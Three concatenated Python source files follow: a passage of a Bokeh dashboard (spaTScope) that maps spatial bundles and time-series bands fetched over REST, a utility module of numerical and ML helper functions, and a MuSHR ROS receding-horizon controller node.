geometries.append(selected_geoms['geometries'][i].bounds)
top_coord = lat_to_web_mercator(selected_geoms['geometries'][i].bounds[3])
bottom_coord = lat_to_web_mercator(selected_geoms['geometries'][i].bounds[1])
left_coord = lon_to_web_mercator(selected_geoms['geometries'][i].bounds[0])
right_coord = lon_to_web_mercator(selected_geoms['geometries'][i].bounds[2])
if (top_coord == bottom_coord and left_coord == right_coord):
top_coord += 10
bottom_coord -= 10
left_coord -= 10
right_coord += 10
elif (top_coord - bottom_coord < 5):
top_coord += 50
bottom_coord -= 50
elif (left_coord - right_coord < 5):
left_coord -= 50
right_coord += 50
top.append(top_coord)
bottom.append(bottom_coord)
left.append(left_coord)
right.append(right_coord)
else:
continue
counts.append(" " + str(selected_geoms['count'][i]) + " ")
areas.append(selected_geoms['geometries'][i].area)
multiplier = 200
try:
areas = [multiplier*(x / max(areas)) for x in areas]
except:
areas = [100]
default_k1 = len(geoms)
noOfTSsummaries.label = str(default_k1) + " bundles"
# Generate the colors
red = Color("green")
colors = list(red.range_to(Color("red"), len(areas)+1))
cols = []
for j in range(len(areas)):
col = (float(counts[j])/areas[j])*((len(areas))/500)*100
if col > len(areas):
col = len(areas)
cols.append(str(colors[int(col)]))
return counts, centroidsY, centroidsX, areas, cols, geometries, top, bottom, left, right
def createFunc(i):
def callback(but):
global default_selected_bundle
for b in buttons:
b.css_classes =['custom_button']
but.css_classes = ['custom_button_selected']
bundle = int(but.label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
return callback
############################
#### CALLBACK FUNCTIONS ####
############################
def fetch_data():
global default_k1, default_selected_bundle
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
for i in list(range(0, max_k1)):
mbrs = curdoc().select_one({'name' : str(i)})
labels = curdoc().select_one({'name' : "label " + str(i)})
if i==0:
mbrs.visible = True
labels.visible = True
else:
mbrs.visible = False
labels.visible = False
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
bundle = int(buttons[0].label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
update_plot()
def update_plot():
# Create the query
global query_x1, query_x2, query_y1, query_y2, service_url, query_url, default_k1, max_bundles
transformer = Transformer.from_crs("epsg:3857", "epsg:3627")
qx1, qy1 = transformer.transform(query_x1+150, query_y1+150)
qx2, qy2 = transformer.transform(query_x2-150, query_y2-150)
# Get the data from the server via REST API
global geoms, bundles
config = dict()
config['x1'] = str(qx1)
config['x2'] = str(qx2)
config['y1'] = str(qy1)
config['y2'] = str(qy2)
config['k1'] = str(default_k1)
config['k2'] = str(default_k2)
config = json.dumps(config)
config = json.loads(config)
r = requests.post(query_url, json=config)
response = r.json()
geoms = pd.read_csv(StringIO(response["content"][0]), header=0, delimiter='|')
bundles = pd.read_csv(StringIO(response["content"][1]), header=0, delimiter=';')
# Update map summaries
my_df = []
for i in list(range(0, len(geoms['wkt']))):
d = {
'bundle' : geoms['bundle'][i],
'count' : geoms['count'][i],
'geometries' : geoms['wkt'][i]
}
my_df.append(d)
geoms = pd.DataFrame(my_df)
if len(geoms) > 0:
geoms['geometries'] = geoms['geometries'].apply(wkt.loads)
geoms = geopandas.GeoDataFrame(geoms, geometry='geometries')
geoms.crs = "EPSG:3627"
geoms = geoms.to_crs(crs="EPSG:4326")
# Update time series summaries
if len(geoms) > 0: # if we have obtained some results, continue normally
for i in list(range(0, len(bundles))):
counts, centroidsY, centroidsX, areas, cols, geometries, top, bottom, left, right = get_spatial_data(i)
fill_alpha = []
line_alpha = []
if len(geoms) == len(bundles) and len(bundles) > max_bundles:
counts = []
cols = []
for j in range(len(areas)):
fill_alpha.append(1)
line_alpha.append(1)
cols.append("blue")
counts.append("")
else:
for j in range(len(counts)):
fill_alpha.append(0.25)
line_alpha.append(0.75)
new_data=dict(counts=counts,
lat=centroidsY,
lon=centroidsX,
size=areas,
fill_alpha=fill_alpha,
line_alpha=line_alpha,
colors=cols,
geometries=geometries,
top=top,
bottom=bottom,
left=left,
right=right)
sourcesMap[i].data = new_data
counts = new_data['counts']
upper = [float(i) for i in bundles['UPPER_BOUND'][i].split(",")]
lower = [float(i) for i in bundles['LOW_BOUND'][i].split(",")]
average = [(g + h) / 2 for g, h in zip(upper, lower)]
new_data=dict(upper=upper,
lower=lower,
average=average,
timestamps=list(range(0, len(bundles['UPPER_BOUND'][0].split(",")))))
sourcesBundles[i].data = new_data
if (upper[0] < float(-1000000000) or lower[0] > float(1000000000)):
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
elif len(counts) == 0:
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
else:
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = True
else: # if results are empty, just plot nothing
for i in list(range(0, default_k1)):
new_data=dict(counts=[],
lat=[],
lon=[],
size=[],
colors=[],
geometries=[])
sourcesMap[i].data = new_data
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(20)})
ts_plot.visible = True
for i in list(range(default_k1, max_k1)):
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
# Update the scale button
new_scale = get_scale()
scaleSelect.label = "Scale 1:" + str(int(new_scale))
# Other callbacks
def selected_k1(event):
global default_k1
default_k1 = int(event.item)
noOfTSsummaries.label = str(default_k1) + " bundles"
update_plot()
def selected_scale(event):
new_scale = int(event.item.split(":")[1])
new_query_x1, new_query_x2, new_query_y1, new_query_y2 = get_query_from_scale(new_scale)
map = curdoc().select_one({'name' : "map"})
map.x_range.start = new_query_x1
map.x_range.end = new_query_x2
map.y_range.start = new_query_y1
map.y_range.end = new_query_y2
global query_x1, query_x2, query_y1, query_y2
query_x1 = new_query_x1
query_x2 = new_query_x2
query_y1 = new_query_y1
query_y2 = new_query_y2
global default_k1, default_selected_bundle
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
for i in list(range(0, max_k1)):
mbrs = curdoc().select_one({'name' : str(i)})
labels = curdoc().select_one({'name' : "label " + str(i)})
if i==0:
mbrs.visible = True
labels.visible = True
else:
mbrs.visible = False
labels.visible = False
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
bundle = int(buttons[0].label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
update_plot()
def threaded_function():
global message, window, response
config = dict()
config['filename'] = filename
config = json.dumps(config)
config = json.loads(config)
r = requests.post(build_index_url, json=config)
response = r.json()
message.destroy()
window.destroy()
def selected_dataset(event):
global query_x1, query_x2, query_y1, query_y2, default_query_x1, default_query_x2, default_query_y1, default_query_y2, window, message, filename, response, build_index_url, cancelled
window = tkinter.Tk()
if event.item == "Open Local":
gui = GUI_local(window)
windowWidth = 763
windowHeight = 55
else:
gui = GUI_remote(window)
windowWidth = 673
windowHeight = 55
positionRight = int(window.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(window.winfo_screenheight()/2 - windowHeight/2)
window.geometry("+{}+{}".format(positionRight, positionDown))
window.lift()
window.attributes('-topmost',True)
window.after_idle(window.attributes,'-topmost',False)
window.focus_force()
window.mainloop()
if cancelled == False:
window = tkinter.Tk()
message = show_message(window, positionRight, positionDown)
thread = threading.Thread(target = threaded_function)
thread.setDaemon(True)
thread.start()
message.mainloop()
r = requests.post(get_rootMBR_url)
response = r.json()
c_query_x1 = float(response['content'][0])
c_query_x2 = float(response['content'][0]) + float(response['content'][2])
c_query_y1 = float(response['content'][1])
c_query_y2 = float(response['content'][1]) + float(response['content'][3])
transformer = Transformer.from_crs("epsg:3627", "epsg:3857")
c_query_x1, c_query_y1 = transformer.transform(c_query_x1+150, c_query_y1+150)
c_query_x2, c_query_y2 = transformer.transform(c_query_x2-150, c_query_y2-150)
map = curdoc().select_one({'name' : "map"})
c_x_diff = c_query_x2 - c_query_x1
c_y_diff = c_query_y2 - c_query_y1
x_diff = map.x_range.end - map.x_range.start
y_diff = map.y_range.end - map.y_range.start
if c_x_diff > c_y_diff:
scale_f = x_diff/y_diff
new_c_y_diff = c_x_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x2
map.y_range.start = c_query_y1
map.y_range.end = c_query_y1 + new_c_y_diff
default_query_x1 = query_x1 = c_query_x1
default_query_x2 = query_x2 = c_query_x2
default_query_y1 = query_y1 = c_query_y1
default_query_y2 = query_y2 = c_query_y1 + new_c_y_diff
update_plot()
else:
scale_f = y_diff/x_diff
new_c_x_diff = c_y_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x1 + new_c_x_diff
map.y_range.start = c_query_y1
map.y_range.end = c_query_y2
default_query_x1 = query_x1 = c_query_x1
default_query_x2 = query_x2 = c_query_x1 + new_c_x_diff
default_query_y1 = query_y1 = c_query_y1
default_query_y2 = query_y2 = c_query_y2
update_plot()
def reset_plot(event):
global query_x1, query_x2, query_y1, query_y2, default_k1
map = curdoc().select_one({'name' : "map"})
map.x_range.start = default_query_x1
map.x_range.end = default_query_x2
map.y_range.start = default_query_y1
map.y_range.end = default_query_y2
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
query_x1 = default_query_x1
query_x2 = default_query_x2
query_y1 = default_query_y1
query_y2 = default_query_y2
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
update_plot()
def getCallback(calls, i):
return lambda: calls[i](buttons[i])
def update1(attr,new,old):
global query_x1
query_x1 = new
def update2(attr,new,old):
global query_x2
query_x2 = new
def update3(attr,new,old):
global query_y1
query_y1 = new
def update4(attr,new,old):
global query_y2
query_y2 = new
def selected_circle(event):
global query_x1, query_x2, query_y1, query_y2
coords = sourcesMap[default_selected_bundle].data['geometries'][sourcesMap[default_selected_bundle].selected.indices[0]]
c_query_x1 = lon_to_web_mercator(coords[0])
c_query_x2 = lon_to_web_mercator(coords[2])
c_query_y1 = lat_to_web_mercator(coords[1])
c_query_y2 = lat_to_web_mercator(coords[3])
map = curdoc().select_one({'name' : "map"})
c_x_diff = c_query_x2 - c_query_x1
c_y_diff = c_query_y2 - c_query_y1
x_diff = query_x2 - query_x1
y_diff = query_y2 - query_y1
if c_x_diff > c_y_diff:
scale_f = x_diff/y_diff
new_c_y_diff = c_x_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x2
map.y_range.start = c_query_y1
map.y_range.end = c_query_y1 + new_c_y_diff
query_x1 = c_query_x1
query_x2 = c_query_x2
query_y1 = c_query_y1
query_y2 = c_query_y1 + new_c_y_diff
update_plot()
else:
scale_f = y_diff/x_diff
new_c_x_diff = c_y_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x1 + new_c_x_diff
map.y_range.start = c_query_y1
map.y_range.end = c_query_y2
query_x1 = c_query_x1
query_x2 = c_query_x1 + new_c_x_diff
query_y1 = c_query_y1
query_y2 = c_query_y2
update_plot()
####################################################################################
####################################################################################
####################################################################################
########################## VISUALIZATION INITIALIZATION ############################
####################################################################################
# Create the map plot for the default scale
tile_provider = get_provider(STAMEN_TERRAIN_RETINA)
globe = x_range, y_range = ((initial_query_x1, initial_query_x2), (initial_query_y1, initial_query_y2))
p = figure(x_range=x_range, y_range=y_range, x_axis_type="mercator", y_axis_type="mercator", name="map", tools="tap, pan, wheel_zoom")
p.on_event(Tap, selected_circle)
p.x_range.on_change('start', update1)
p.x_range.on_change('end', update2)
p.y_range.on_change('start', update3)
p.y_range.on_change('end', update4)
p.sizing_mode = 'stretch_both'
p.add_tile(tile_provider)
p.xaxis.visible = False
p.yaxis.visible = False
p.toolbar.active_scroll = p.select_one(WheelZoomTool)
p.toolbar_location = None
# Create the time series plots for the default map scale
ts_plots = []
buttons = []
sourcesMap = []
sourcesBundles = []
ts_plot_height = 200
for i in list(range(0, max_k1)):
source = ColumnDataSource(
data=dict(counts=[],
lat=[],
lon=[],
size=[],
colors=[],
fill_alpha=[],
line_alpha=[],
geometries=[],
top=[],
bottom=[],
left=[],
right=[])
)
sourcesMap.append(source)
c = p.quad(top="top", bottom="bottom", left="left", right="right", fill_color="colors", fill_alpha="fill_alpha", line_alpha="line_alpha", line_color="colors", line_width=4, source=source, name=str(i))
glyph = Quad(fill_color="colors", fill_alpha="fill_alpha", line_alpha="line_alpha", line_color="colors", line_width=4)
c.selection_glyph = glyph
c.nonselection_glyph = glyph
labels = LabelSet(x='lon', y='lat', text_font='helvetica', text='counts', text_font_size='20px', text_font_style='bold', text_align='center', text_baseline='middle', text_color='white', background_fill_color='colors', level='overlay', x_offset=-7, y_offset=-7, source=source, render_mode='canvas', name="label " + str(i))
p.add_layout(labels)
if i==0:
c.visible = True
labels.visible = True
else:
c.visible = False
labels.visible = False
source = ColumnDataSource(
data=dict(upper=[],
lower=[],
average=[],
timestamps=[])
)
sourcesBundles.append(source)
s = figure(background_fill_color="#fafafa", name="fig " + str(i))
s.toolbar_location = None
s.line(x="timestamps", y="upper", color="#53777a", line_width=3, source=source, alpha=0.3)
s.line(x="timestamps", y="lower", color="#53777a", line_width=3, source=source, alpha=0.3)
s.line(x="timestamps", y="average", color="#53777a", line_width=2, source=source)
band = Band(base="timestamps", upper='upper', lower='lower', source=source, level='underlay', fill_alpha=0.2, fill_color='#53777a')
s.add_layout(band)
buttons.append(Button(label=str(i+1), css_classes=['custom_button'], name="button " + str(i), sizing_mode = 'stretch_height'))
s.height = ts_plot_height
s.sizing_mode = 'stretch_width'
button_row = row(buttons[i])
button_row.width = 44
button_row.height = ts_plot_height - 20
layout = row(button_row, s, name="ts_plot " + str(i))
layout.sizing_mode = 'stretch_both'
ts_plots.append(layout)
##################################################################
##################################################################
# Add all extra functionality buttons and define their callbacks
fetchButton = Button(label="Fetch", css_classes=['custom_button_fetch'])
fetchButton.on_event(ButtonClick, fecth_data)
resetButton = Button(label="Reset", css_classes=['custom_button_reset'])
resetButton.on_event(ButtonClick, reset_plot)
menuTSsummaries = [("1", "1"), ("2", "2"), ("3", "3"), ("4", "4"), ("5", "5"), ("6", "6"), ("7", "7"), ("8", "8"), ("9", "9"), ("10", "10")]
noOfTSsummaries = Dropdown(css_classes=['custom_button'], menu=menuTSsummaries)
noOfTSsummaries.label = str(default_k1) + " bundles"
noOfTSsummaries.on_click(selected_k1)
selectDataset = [("Open Local", "Open Local"), ("Open Remote", "Open Remote")]
selectDatasetDropdown = Dropdown(label="Open Dataset", css_classes=['custom_button'], menu=selectDataset)
selectDatasetDropdown.on_click(selected_dataset)
menuScale = [("1:500", "Scale 1:500"), ("1:5000", "Scale 1:5000"), ("1:10000", "Scale 1:10000"), ("1:15000", "Scale 1:15000"), ("1:20000", "Scale 1:20000"), ("1:25000", "Scale 1:25000")]
scaleSelect = Dropdown(css_classes=['custom_button'], menu=menuScale)
scaleSelect.on_click(selected_scale)
callbacks = [createFunc(i) for i in range(max_k1)]
for i in range(max_k1):
buttons[i].on_click(getCallback(callbacks, i))
buttons[0].css_classes = ['custom_button_selected']
# Add everything to layouts and to the final application
ts_plots = column(ts_plots)
ts_plots.sizing_mode = 'stretch_both'
func_buttons = row(fetchButton, resetButton, selectDatasetDropdown, noOfTSsummaries, scaleSelect)
func_buttons.sizing_mode = 'stretch_width'
lay1 = column(ts_plots, name="ts_plots")
lay2 = column(func_buttons, p, name="map_div")
lay1.sizing_mode = 'stretch_width'
lay2.sizing_mode = 'stretch_both'
curdoc().add_root(lay1)
curdoc().add_root(lay2)
curdoc().title = "spaTScope"
|
_util.py
|
# instance.method = MethodType(method, instance)
# !aws codecommit list-repositories
# !autopep8 --in-place --aggressive --aggressive brac_dual_agent.py
# gpus = tf.config.experimental.list_physical_devices('GPU')
# if gpus:
# try:
# for gpu in gpus:
# tf.config.experimental.set_memory_growth(gpu, True)
# except RuntimeError as e:
# print(e)
#############################################################################
# %matplotlib inline
# !tar -czf data.tar.gz data
# !tar -czf code.tar.gz code
from inspect import getsource
from importlib import reload
from livelossplot import PlotLosses
import pytz
import tensorflow as tf
import silence_tensorflow.auto
# tz_NY = pytz.timezone('America/New_York')
# dt.now(tz_NY).strftime("%D:%H:%M:%S")
from typing import Dict, List, Set, Tuple
from datetime import datetime as dt
import itertools
import io
import sys
import gym
import ray
import warnings
warnings.simplefilter("ignore")
# from sagemaker import get_execution_role
# role = get_execution_role()
from IPython.display import clear_output
from tqdm import tqdm
# https://github.com/tqdm/tqdm
"""
pbar = tqdm(["a", "b", "c", "d"])
for char in pbar:
time.sleep(0.25)
pbar.set_description("Processing %s" % char)
for i in tqdm(range(10)):
"""
def smooth_loss(loss, freq):
loss = arr(loss).copy()
return np.mean(loss.reshape(-1, freq), axis = -1)
from types import MethodType
import functools
from functools import reduce
#############################################################################
# Packages
import scipy as sp
import pandas as pd
from pandas import DataFrame as DF
# import statsmodels.api as sm # !pip install statsmodels
from matplotlib.pyplot import hist
import pickle
from scipy.stats import truncnorm
import matplotlib.pyplot as plt
####################################
# Random
import random
from random import seed as rseed
from numpy.random import seed as npseed
from numpy import absolute as np_abs
from numpy.random import normal as rnorm
from numpy.random import uniform as runi
from numpy.random import binomial as rbin
from numpy.random import poisson as rpoisson
from numpy.random import shuffle,randn, permutation # randn(d1,d2) is d1*d2 i.i.d N(0,1)
from numpy import squeeze
from numpy.linalg import solve
####################################
# Numpy
import numpy as np
from numpy import mean, var, std, median
from numpy import array as arr
from numpy import sqrt, log, cos, sin, exp, dot, diag, ones, identity, zeros, roll, multiply, stack, concatenate, transpose
from numpy import concatenate as v_add
from numpy.linalg import norm, inv
from numpy import apply_along_axis as apply
from numpy.random import multinomial, choice
####################################
# sklearn
import sklearn as sk
from sklearn import preprocessing as pre
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import r2_score
from sklearn.linear_model import LinearRegression as lm
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
from scipy.special import softmax
#############################################################################
import os
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
np.set_printoptions(precision = 4)
#############################################################################
import time
now = time.time
import smtplib, ssl
import datetime, pytz
def EST():
return datetime.datetime.now().astimezone(pytz.timezone('US/Eastern')).strftime("%H:%M, %m/%d")
#############################################################################
dash = "--------------------------------------"
DASH = "\n" + "--------------------------------------" + "\n"
Dash = "\n" + dash
dasH = dash + "\n"
#############################################################################
#%% utility funs
from multiprocessing import Pool
import multiprocessing
n_cores = multiprocessing.cpu_count()
def mute():
sys.stdout = open(os.devnull, 'w')
def fun(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs = multiprocessing.cpu_count(), **args):#-2
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
def g(x):
return f(x, **args)
proc = [multiprocessing.Process(target=fun, args=(g, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
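# Minimal usage sketch for parmap (hypothetical values). The closure `g` handed to
# multiprocessing.Process is only shared implicitly under the fork start method
# (the Linux default); spawn-based platforms would fail to start the workers.
#   squares = parmap(lambda x: x ** 2, range(8), nprocs=4)
#   # -> [0, 1, 4, 9, 16, 25, 36, 49], returned in input order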
def setminus(A, B):
return [item for item in A if item not in B]
def listinlist2list(theList):
return [item for sublist in theList for item in sublist]
def if_exist(obj):
    # check the caller's frame; locals() here would only see this function's own scope
    frame = sys._getframe(1)
    return obj in frame.f_locals or obj in frame.f_globals
def getSize(one_object):
print(one_object.memory_usage().sum() / 1024 ** 2, "MB")
# print(sys.getsizeof(one_object) // 1024, "MB")
def dump(file, path):
pickle.dump(file, open(path, "wb"))
def load(path):
return pickle.load(open(path, "rb"))
def get_MB(a):
MB = sys.getsizeof(a) / 1024 / 1024
return MB
def hstack_all_comb(array1, array2):
# array1 is on the left and also changes faster
res = np.hstack([
np.tile(array1, (array2.shape[0], 1))
, np.repeat(array2, array1.shape[0], axis=0)]
)
return res
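# Illustrative sketch (hypothetical shapes): for array1 of shape (2, a) and
# array2 of shape (3, b) the result has shape (6, a + b), with array1 cycling fastest:
#   hstack_all_comb(np.eye(2), np.ones((3, 1)))
#   # rows: [1,0,1], [0,1,1], [1,0,1], [0,1,1], [1,0,1], [0,1,1]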
def quantile(a, p):
r = [a[0] for a in DF(a).quantile(p).values]
return np.round(r, 3)
def flatten(l):
# list of sublist -> list
return [item for sublist in l for item in sublist]
def change_rate(old_targets, new_targets, numpy = False):
if numpy:
diff = np.mean(abs(new_targets-old_targets)) / (np.mean(abs(old_targets))+1e-6)
else:
diff = abs(new_targets-old_targets).mean() / (abs(old_targets).mean()+1e-6)
return min(1.0, diff)
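# Illustrative sketch (hypothetical arrays): the mean absolute change relative to
# the mean absolute old value, capped at 1.0:
#   change_rate(arr([1.0, 2.0]), arr([1.5, 2.5]))  # -> 0.5 / 1.5 ~= 0.333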
#############################################################################
# pd.options.display.max_rows = 10
# with open('pred_columns.txt', 'w') as filehandle:
# k = 0
# for listitem in list(a):
# filehandle.write('{} {}\n'.format(k, listitem))
# k += 1
def print_all(dat, column_only = True):
if column_only:
with pd.option_context('display.max_columns', None): # more options can be specified also
print(dat)
else:
with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
print(dat)
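# Note: the decile-style quantile() below overrides the two-argument
# quantile(a, p) defined earlier in this module; only this version remains
# bound to the name afterwards.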
def quantile(a):
return np.percentile(a, range(0,110,10))
#############################################################################
def unzip(path, zip_type = "tar_gz"):
if zip_type == "tar_gz":
import tarfile
tar = tarfile.open(path, "r:gz")
tar.extractall()
tar.close()
elif zip_type == "zip":
from zipfile import ZipFile
with ZipFile(path, 'r') as zipObj:
# Extract all the contents of zip file in current directory
zipObj.extractall()
# import shutil
# total, used, free = shutil.disk_usage("/")
# print("Total: %d GiB" % (total // (2**30)))
# print("Used: %d GiB" % (used // (2**30)))
# print("Free: %d GiB" % (free // (2**30)))
#############################################################################
# !pip install termcolor
from termcolor import colored, cprint
# https://pypi.org/project/termcolor/#description
def printR(theStr):
print(colored(theStr, 'red'))
def printG(theStr):
print(colored(theStr, 'green'))
def printB(theStr):
print(colored(theStr, 'blue'))
def sets_intersection(d):
return list(reduce(set.intersection, [set(item) for item in d ]))
def select_each_row(array, idx):
return np.take_along_axis(array, idx[:,None], axis=1)
def subtract_each_column(mat, col):
return (mat.transpose() - col).transpose()
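# Illustrative sketch (hypothetical values):
#   select_each_row(arr([[10, 20], [30, 40]]), arr([1, 0]))   # -> [[20], [30]]
#   subtract_each_column(arr([[1, 2], [3, 4]]), arr([1, 2]))  # -> [[0, 1], [1, 2]]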
def sample_split(L, N):
""" replay buffer?
"""
kf = KFold(n_splits=L)
kf.get_n_splits(zeros(N))
split_ind = {}
k = 0
for i, j in kf.split(range(N)):
split_ind[k] = {"train_ind" : i, "test_ind" : j}
k += 1
return split_ind
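# Minimal sketch of the returned structure (hypothetical L=2, N=4): KFold without
# shuffling puts consecutive indices in each test fold, so sample_split(2, 4)
# yields {0: {"train_ind": array([2, 3]), "test_ind": array([0, 1])},
#         1: {"train_ind": array([0, 1]), "test_ind": array([2, 3])}}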
def row_repeat(mat, rep, full_block = False):
if full_block:
return np.tile(mat, (rep, 1))
else:
return np.repeat(mat, rep, axis=0)
def SARS2traj(SARS, S_dim = 3):
states = arr([sars[0][:S_dim] for sars in SARS])
actions = arr([sars[1] for sars in SARS])
return states, actions
|
rhcnode.py
|
#!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import cProfile
import os
import signal
import threading
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from geometry_msgs.msg import Point, PoseStamped
from std_msgs.msg import ColorRGBA, Empty
from std_srvs.srv import Empty as SrvEmpty
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCNode(rhcbase.RHCBase):
def __init__(self, dtype, params, logger, name):
rospy.init_node(name, anonymous=True, disable_signals=True)
super(RHCNode, self).__init__(dtype, params, logger)
self.reset_lock = threading.Lock()
self.inferred_pose_lock = threading.Lock()
self._inferred_pose = None
self.cur_rollout = self.cur_rollout_ip = None
self.traj_pub_lock = threading.Lock()
self.goal_event = threading.Event()
self.map_metadata_event = threading.Event()
self.ready_event = threading.Event()
self.events = [self.goal_event, self.map_metadata_event, self.ready_event]
self.run = True
self.do_profile = self.params.get_bool("profile", default=False)
self.NPOS = self.params.get_int("npos", default=3)
def start_profile(self):
if self.do_profile:
self.logger.warn("Running with profiling")
self.pr = cProfile.Profile()
self.pr.enable()
def end_profile(self):
if self.do_profile:
self.pr.disable()
self.pr.dump_stats(os.path.expanduser("~/mushr_rhc_stats.prof"))
def start(self):
self.logger.info("Starting RHController")
self.start_profile()
self.setup_pub_sub()
self.rhctrl = self.load_controller()
self.T = self.params.get_int("T")
self.ready_event.set()
rate = rospy.Rate(50)
self.logger.info("Initialized")
while not rospy.is_shutdown() and self.run:
ip = self.inferred_pose()
next_traj, rollout = self.run_loop(ip)
with self.traj_pub_lock:
if rollout is not None:
self.cur_rollout = rollout.clone()
self.cur_rollout_ip = ip
if next_traj is not None:
self.publish_traj(next_traj, rollout)
# For experiments. If the car is at the goal, notify the
# experiment tool
if self.rhctrl.at_goal(self.inferred_pose()):
self.expr_at_goal.publish(Empty())
self.goal_event.clear()
rate.sleep()
self.end_profile()
def run_loop(self, ip):
self.goal_event.wait()
if rospy.is_shutdown() or ip is None:
return None, None
with self.reset_lock:
            # If a reset is initiated after the goal_event was set, the goal
# will be cleared. So we have to have another goal check here.
if not self.goal_event.is_set():
return None, None
if ip is not None:
return self.rhctrl.step(ip)
self.logger.err("Shouldn't get here: run_loop")
def shutdown(self, signum, frame):
rospy.signal_shutdown("SIGINT recieved")
self.run = False
for ev in self.events:
ev.set()
def setup_pub_sub(self):
rospy.Service("~reset/soft", SrvEmpty, self.srv_reset_soft)
rospy.Service("~reset/hard", SrvEmpty, self.srv_reset_hard)
rospy.Subscriber(
"/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
)
rospy.Subscriber(
rospy.get_param("~inferred_pose_t"),
PoseStamped,
self.cb_pose,
queue_size=10,
)
self.rp_ctrls = rospy.Publisher(
self.params.get_str(
"ctrl_topic", default="mux/ackermann_cmd_mux/input/navigation"
),
AckermannDriveStamped,
queue_size=2,
)
traj_chosen_t = self.params.get_str("traj_chosen_topic", default="~traj_chosen")
self.traj_chosen_pub = rospy.Publisher(traj_chosen_t, Marker, queue_size=10)
# For the experiment framework, need indicators to listen on
self.expr_at_goal = rospy.Publisher("/experiment_tool/finished", Empty, queue_size=1)
def srv_reset_hard(self, msg):
"""
Hard reset does a complete reload of the controller
"""
rospy.loginfo("Start hard reset")
self.reset_lock.acquire()
        self.rhctrl = self.load_controller()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End hard reset")
return []
def srv_reset_soft(self, msg):
"""
Soft reset only resets soft state (like tensors). No dependencies or maps
are reloaded
"""
rospy.loginfo("Start soft reset")
self.reset_lock.acquire()
self.rhctrl.reset()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End soft reset")
return []
def cb_goal(self, msg):
goal = self.dtype(utils.rospose_to_posetup(msg.pose))
self.ready_event.wait()
if not self.rhctrl.set_goal(goal):
self.logger.err("That goal is unreachable, please choose another")
return
else:
self.logger.info("Goal set")
self.goal_event.set()
def cb_pose(self, msg):
self.set_inferred_pose(self.dtype(utils.rospose_to_posetup(msg.pose)))
if self.cur_rollout is not None and self.cur_rollout_ip is not None:
m = Marker()
m.header.frame_id = "map"
m.type = m.LINE_STRIP
m.action = m.ADD
with self.traj_pub_lock:
pts = (
self.cur_rollout[:, :2] - self.cur_rollout_ip[:2]
) + self.inferred_pose()[:2]
m.points = map(lambda xy: Point(x=xy[0], y=xy[1]), pts)
r, g, b = 0x36, 0xCD, 0xC4
m.colors = [ColorRGBA(r=r / 255.0, g=g / 255.0, b=b / 255.0, a=0.7)] * len(
m.points
)
m.scale.x = 0.05
self.traj_chosen_pub.publish(m)
def publish_traj(self, traj, rollout):
assert traj.size() == (self.T, 2)
ctrl = traj[0]
ctrlmsg = AckermannDriveStamped()
ctrlmsg.header.stamp = rospy.Time.now()
ctrlmsg.drive.speed = ctrl[0]
ctrlmsg.drive.steering_angle = ctrl[1]
self.rp_ctrls.publish(ctrlmsg)
def set_inferred_pose(self, ip):
with self.inferred_pose_lock:
self._inferred_pose = ip
def inferred_pose(self):
with self.inferred_pose_lock:
return self._inferred_pose
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCNode(rhctensor.float_tensor(), params, logger, "rhcontroller")
